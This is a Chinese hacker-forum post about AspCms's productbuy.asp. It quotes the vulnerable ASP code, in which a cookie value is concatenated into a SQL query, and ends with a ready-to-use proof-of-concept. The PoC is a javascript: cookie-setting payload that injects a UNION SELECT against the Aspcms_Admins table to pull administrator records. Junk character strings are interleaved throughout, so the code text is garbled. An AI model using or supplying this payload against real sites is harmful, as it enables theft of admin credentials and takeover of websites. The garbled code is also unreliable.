好久没上土司了,上来一看发现在删号名单内.....
0 y, ^9 h' _& ]; j5 B5 P8 _& E( w2 i也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
+ [& G" q F p# h4 A废话不多说,看代码:
# q% `7 s* C$ t* K7 l7 }- L( Y) s- _$ x/ g9 R* } Z
<%1 l' s2 f, B1 k( N
8 E. ^) J1 M% }2 Wif action = "buy" then
( u6 I: x7 e- T5 d" e) A; d5 G! s( u5 t5 J
addOrder()
& L) f) ?$ L* M( X$ H& ~/ p0 C" S Q3 O4 Y. J- Y- _- X
else7 R$ k7 | f$ p
" a3 S0 T+ h3 S3 ? echoContent()( ~* A) M {7 P. H2 W5 A
% [5 u0 E- h+ @4 t, uend if: g3 L6 w( l& }2 f2 d
' r& D$ C" H, `6 P7 w- k. d+ P+ B
" t% t8 s0 c3 V: e( P……略过' N5 i& f% u- H
2 Z* ~* k5 C3 |( a, [$ y1 _! V
. G* j' O7 Y3 W1 j# R) Q
/ c% M" {3 q) d4 ZSub echoContent()
$ p( V- q$ _# B, X% I% R
' u- S- {% |! t, R. f( M' i dim id4 ~$ J d% `% e# T3 \; Z o
5 }( F0 ]+ [6 z% O
id=getForm("id","get")
i$ _$ t C% N/ q
- R& K1 r5 Q J6 [* I ; U5 E9 [( P/ y! j, p1 G
7 @1 c/ P3 C( E1 k6 {; ^6 z) P7 p
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
0 h! Z0 J0 e( w2 o0 Q' e/ n, ~
3 m+ b8 g$ y" z" ~) ~ * h+ k/ U' K/ H; V/ ~3 O
9 u: ~ J0 D9 i$ Q: [ dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")% d5 m u* z$ s$ j# Z# `( Z
4 C4 ~( T$ r, b( G0 E: g
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
2 u) r% ^ D/ x% {: M3 y+ B( W; G! J3 [
Dim templatePath,tempStr
, E+ R: b( j2 S" _6 j
- y7 T6 n& ^ C/ I/ Y. n templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"1 F; ^3 e1 ^2 g& g; ~* B
" {7 ~, x9 b6 ]! ?0 O U+ _! K3 S# M' ]
E* E [: J" v" Z8 W& |% y) ?# |6 {9 E" q
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
/ C+ u, i$ B2 z1 R9 F& ?7 I( g6 S7 O+ U* E: f& B4 s' r5 x9 a
selectproduct=rsObj(0)
1 w3 i I/ p0 D
4 u! }! D- \3 u$ R
4 d' i8 Q& T9 t; _' Z- U7 o5 m* |) [5 @; V0 o
Dim linkman,gender,phone,mobile,email,qq,address,postcode
' i/ F: Z+ L' j) |1 t4 g1 M3 ^
! x# D1 p% @# g8 _1 a5 v4 q7 F& \ if isnul(rCookie("loginstatus")) then wCookie"loginstatus",02 H) I' L/ w8 G
8 k5 ?! G7 |9 h- M/ b$ R* N
if rCookie("loginstatus")=1 then
$ p }7 a6 ]/ a- a/ m" h* W+ @. \, G! b: K1 M% [# ^
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")) @7 j Z1 K- p7 h
3 L2 U1 k0 t" Y8 d1 M
linkman=rsObj("truename")
+ q( d6 c% A: ^2 b; E: E8 V# Y
- ^( T G5 ~. O' O+ V7 | gender=rsObj("gender")( \. z5 ~0 p& W
, [# A. f0 J1 F2 P2 g ] phone=rsObj("phone")2 l8 m/ Y1 j% e1 a7 c; H0 g
# S: `, M2 X4 m) z7 W# ? mobile=rsObj("mobile")3 ?1 E6 s1 Z: H
/ Y. W) e9 i8 |, g9 ~
email=rsObj("email")
# J; X* W# ~. @* ?. J, s; ?9 h
' @6 v7 }+ i7 i2 }4 { qq=rsObj("qq")
5 V; c# V( j, m, I, E" ^
. U% Y# y! p H* H# V address=rsObj("address")
, ]2 k! j( B- g
( a2 H7 p; ] u% Z9 @ postcode=rsObj("postcode")
; Y9 p9 ?( x: q
5 ]4 @8 y% |- T* B else
3 e7 I S3 z p/ I) Z
; e9 p q7 v+ \( z# u" z& {* ~ gender=1
1 L% i- s2 ]5 }9 F% x. C6 D% I: H4 d! E
end if( j ?1 h+ T$ i, k( N
, C+ V$ ]. `4 P/ g+ {3 k rsObj.close(), f7 \$ j. r4 t% h) [) ]
7 o( ~4 o. y H# g
+ K6 w; \4 Q# W9 d1 k/ D2 [4 L2 Q& @: T7 }4 [/ x
with templateObj & Q$ v2 U+ p1 f7 }, ?
$ Z% O/ E( F0 R4 n .content=loadFile(templatePath) , q) j! s" M/ h" K( q4 t
, L0 H1 O1 W8 c. t- g9 ? .parseHtml()
4 |5 J2 A7 L# _8 S+ i' r/ F) V& A/ A4 Z8 `; B( m
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
' W' x L$ Z2 d' r8 ?3 _; n2 k* O( i) h$ m4 E- [, E, y
.content=replaceStr(.content,"[aspcms:linkman]",linkman) : e- c$ s5 Z: a9 V9 b! H
' O# F* T3 P: G& o+ E, m8 R' { .content=replaceStr(.content,"[aspcms:gender]",gender) ( ~5 t" f+ h$ @% ~8 f
) h" N2 ~/ X9 v- O8 R, ?5 x! z" w .content=replaceStr(.content,"[aspcms:phone]",phone) s1 f( b' M. w+ J1 \: r i+ Q/ z
9 {: `' T* x( R( r$ | .content=replaceStr(.content,"[aspcms:mobile]",mobile)
# H6 t1 G0 D0 G7 m( S; {3 d! p. p! G7 {0 u1 C
.content=replaceStr(.content,"[aspcms:email]",email) 8 S7 x7 C8 i0 W, B4 t; B: Q5 S
: \7 A$ Y1 Q3 |" S .content=replaceStr(.content,"[aspcms:qq]",qq) ( Z* D6 K+ J& f( w
! U* ?( _$ R8 {9 A" F8 y% a .content=replaceStr(.content,"[aspcms:address]",address) ( n+ `8 @, D$ n" `' a: a
) G: L/ P4 k* [+ ^( i .content=replaceStr(.content,"[aspcms:postcode]",postcode)
+ A! }( U# g; |, _- ^- G( @% o
5 r) o3 N' n* E+ s7 [ .parseCommon()
( B' R) k' b9 p6 Z# L' l$ ?% \4 o1 w* N/ g" e
echo .content * K& |- F; I. m' z; p
2 ^2 K* n6 a- N$ x# l
end with
! m) s6 o. E% M( ?% d
2 ]: \' x6 [" m8 f- |: i# n, i set templateobj =nothing : terminateAllObjects
8 a! i6 N) S9 s0 q+ L, A2 v( K
/ A/ b- D! h2 I% p4 c: KEnd Sub. u; E' f8 L) T v
漏洞很明显,没啥好说的
1 a- Q$ A! t5 Ipoc:
0 K" u; T- r( b' F: H9 v
7 M" V$ u- H; L3 u- e' ~% Vjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
( E* Q/ B7 ~/ }6 J5 Y5 z G0 V8 U. ?6 V
|